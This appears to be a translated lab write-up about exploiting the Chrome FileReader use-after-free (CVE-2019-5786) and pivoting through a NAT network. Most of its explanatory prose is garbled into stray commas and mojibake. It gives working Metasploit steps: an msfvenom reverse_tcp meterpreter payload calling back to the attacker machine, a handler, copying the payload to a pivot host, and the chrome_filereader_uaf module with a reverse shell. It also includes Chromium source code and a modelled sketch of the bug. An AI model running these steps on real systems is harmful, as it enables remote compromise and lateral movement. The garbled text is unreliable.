Obtaining a meterpreter session inside a NAT network using a Chrome machine and pivoting

[image]


Pendahuluan


Hello everyone, in this article I want to share my experience of exploiting the Chrome FileReader UAF vulnerability, carrying out a pivoting technique, and of course writing my first article.


Pentest , , , . , - , My English level is bad, , . , - , , .


CVE-2019-5786 Chrome FileReader Use After Free (UAF) — ( 8 2019 ), , , ( ), .


?


, , , , , JavaScript.



js « » — , , (, , ) , . « , », . .


FileReader


FileReader — , File/Blob , (loaded, progress, error ...). ArrayBuffer readToArrayBuffer, , .


HTML5 Web-workers


Web-worker — , JavaScript . , web-worker ( 3D). , web-worker , postMessage.


postMessage API


postMessage — API (iFrame, web-worker, service-worker ..). , — transfer, , -.



, filereader.onprogress ArrayBuffer, .


DOMArrayBuffer* FileReaderLoader::ArrayBufferResult() {
  DCHECK_EQ(read_type_, kReadAsArrayBuffer);
  if (array_buffer_result_)
    return array_buffer_result_;

  // If the loading is not started or an error occurs, return an empty result.
  if (!raw_data_ || error_code_ != FileErrorCode::kOK)
    return nullptr;

  DOMArrayBuffer* result = DOMArrayBuffer::Create(raw_data_->ToArrayBuffer());
  if (finished_loading_) {
    array_buffer_result_ = result;
    AdjustReportedMemoryUsageToV8(
        -1 * static_cast<int64_t>(raw_data_->ByteLength()));
    raw_data_.reset();
  }
  return result;
}

filereader.onprogress, ArrayBuffer.


DOMArrayBuffer* FileReaderLoader::ArrayBufferResult() {
  DCHECK_EQ(read_type_, kReadAsArrayBuffer);
  if (array_buffer_result_)
    return array_buffer_result_;

  // If the loading is not started or an error occurs, return an empty result.
  if (!raw_data_ || error_code_ != FileErrorCode::kOK)
    return nullptr;

  if (!finished_loading_) {
    return DOMArrayBuffer::Create(
        ArrayBuffer::Create(raw_data_->Data(), raw_data_->ByteLength()));
  }

  array_buffer_result_ = DOMArrayBuffer::Create(raw_data_->ToArrayBuffer());
  AdjustReportedMemoryUsageToV8(-1 *
                                static_cast<int64_t>(raw_data_->ByteLength()));
  raw_data_.reset();
  return array_buffer_result_;
}

web-worker postMessage. , , , . , , . .
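The two versions of FileReaderLoader::ArrayBufferResult() above differ only in how a partial (in-progress) result is built. The following is an added example, not Chromium code, that models that difference in a few dozen lines: before the fix, a partial result could be a DOMArrayBuffer wrapping the same backing store as the loader's raw_data_, so two results taken from onprogress callbacks could alias one buffer, and transferring one of them (postMessage with the buffer in the transfer list) detached the other. After the fix, each partial result is a fresh copy of the bytes read so far. All type and function names here (BackingStore, ArrayBufferHandle, Loader, SecondResultAfterTransfer) are this example's own stand-ins, and the sample bytes are constructed.

```cpp
// Added example (not Chromium code): simplified model of the pre-fix and
// post-fix behaviour of FileReaderLoader::ArrayBufferResult() for a read
// that has not finished yet. Names are stand-ins chosen for this example.
#include <cstddef>
#include <cstdint>
#include <initializer_list>
#include <memory>
#include <vector>

// Stand-in for an ArrayBuffer's backing store. A transfer detaches the store
// from every handle that referenced it; modelled here by a flag plus
// dropping the bytes, so no handle ever touches freed memory in this model.
struct BackingStore {
  std::vector<uint8_t> bytes;
  bool detached = false;
};

// Stand-in for DOMArrayBuffer: a handle onto a BackingStore.
struct ArrayBufferHandle {
  std::shared_ptr<BackingStore> store;

  bool IsDetached() const { return store->detached; }
  size_t ByteLength() const { return store->detached ? 0 : store->bytes.size(); }

  // Model of transferring this buffer to a worker: the store is neutered.
  void Transfer() {
    store->detached = true;
    store->bytes.clear();
    store->bytes.shrink_to_fit();
  }
};

// Stand-in for FileReaderLoader together with its raw_data_ builder.
class Loader {
 public:
  void AppendChunk(std::initializer_list<uint8_t> chunk) {
    raw_data_->bytes.insert(raw_data_->bytes.end(), chunk.begin(), chunk.end());
  }

  // Pre-fix behaviour for an in-progress read: the handle can alias the
  // loader's own store, so two calls can hand out the same memory.
  ArrayBufferHandle PartialResultUnsafe() { return ArrayBufferHandle{raw_data_}; }

  // Post-fix behaviour: copy the bytes read so far into a fresh store, the
  // role ArrayBuffer::Create(raw_data_->Data(), raw_data_->ByteLength()) plays.
  ArrayBufferHandle PartialResultFixed() {
    auto copy = std::make_shared<BackingStore>();
    copy->bytes = raw_data_->bytes;
    return ArrayBufferHandle{copy};
  }

 private:
  std::shared_ptr<BackingStore> raw_data_ = std::make_shared<BackingStore>();
};

// Simulates two onprogress callbacks each taking a partial result, then the
// first result being transferred. Returns the second result so the caller
// can inspect whether it survived (fixed) or was detached too (unsafe).
ArrayBufferHandle SecondResultAfterTransfer(bool use_fix) {
  Loader loader;
  loader.AppendChunk({0x41, 0x42, 0x43, 0x44});  // constructed sample data
  ArrayBufferHandle first = use_fix ? loader.PartialResultFixed()
                                    : loader.PartialResultUnsafe();
  ArrayBufferHandle second = use_fix ? loader.PartialResultFixed()
                                     : loader.PartialResultUnsafe();
  first.Transfer();
  return second;
}
```

With use_fix set to false the second handle is left detached (length 0) by the transfer of the first one, which is the aliasing the fixed version removes; with use_fix set to true the second handle still reports its 4 bytes.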


Pivoting


, , — Pivoting, .


[image]


:


  • (Kali linux).
  • NAT .
  • HiTM (Host in the middle) — , , ( ).

NAT Network Address Translation HiTM , , IP NAT ( IP ). IP .


NAT , IP , (//).


, HiTM , , , !


Pivot , HiTM, , . Pivoting โ€” , .



:


  • Virtual Box ( VMWare ).
  • Kali linux ().
  • Windows 7 ().
  • Linux (HiTM machine).
  • - , , .

:


  1. Virtual box 2 NAT KaliNetwork — 10.0.2.0/24, VMNetwork — 10.0.3.0/24 ( preferences/network).

    [image]
  2. Kali, Network, NAT network KaliNetwork.
  3. (Windows 7) NAT Network VMNetwork.
  4. , KaliNetwork, VMNetwork.
  5. ssh ssh ( ), GatewayPorts = yes /etc/ssh/sshd_config.

    [image]
  6. Chrome 72.0.3626.119 .

, .


. , nmap, , , .


nmap -n -sn 10.0.2.0/24

nmap ping 10.0.2.0/24 ( 10.0.2.1 10.0.2.255) , ( , , ).


[image]


?


  • 10.0.2.7 — Kali.
  • 10.0.2.5 — pivot .
  • virtual box .

HiTM . Metasploit framework โ€” , .


metasploit .


msfconsole -q

.


use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.0.2.7
exploit -j

:


  • use exploit/multi/handler metasploit, .
  • set payload linux/x86/meterpreter/reverse_tcp , meterpreter reverse_tcp , . , bind_tcp.
  • set LHOST 10.0.2.7 , ( 4444).
  • exploit -j .

, , , Kali.


metasploit msfvenom HiTM . .


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.7 LPORT=4444 -f elf > ./expl.elf

[image]


( ).
ssh :


scp ./expl.elf username@10.0.2.5:'expl.elf'

HiTM .


[image]


, meterpreter .


sessions -i 1

ifconfig , 10.0.3.0/24.


[image]


, , Pivot .


. , pivot , , , 10.0.3.0/24 10.0.2.0/24 , payload - , .


pivot , , , .


, metasploit, ssh.


2 :


  • 8080 — .
  • 5555 — meterpreter .

pivot .


[image]


, metasploit .


use exploit/windows/browser/chrome_filereader_uaf
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.3.6
set LPORT 5555
set EXITFUNC thread
set URIPATH /
exploit -j


  • use exploit/windows/browser/chrome_filereader_uaf , .
  • set payload windows/meterpreter/reverse_tcp meterpreter windows.
  • set LHOST 10.0.3.6 , pivot , VMNetwork, tcp pivot , pivot .
  • set LPORT 5555 5555, 4444 pivot .
  • set EXITFUNC thread , , -, , .
  • set URIPATH / , , http://10.0.3.6:8080/ , .

, chrome, , --no-sandbox .


chrome.exe --no-sandbox

, IP, LHOST http://10.0.3.6:8080/ — 8080, , , - , .


[image]


- , meterpreter, .


[image]


Basically that's all, victory; we can develop the attack further however we like. Of course, too many stars have to align to exploit this vulnerability, but networks can differ and so can people, so in my opinion knowledge of this vulnerability will not be superfluous, though who knows.


Material

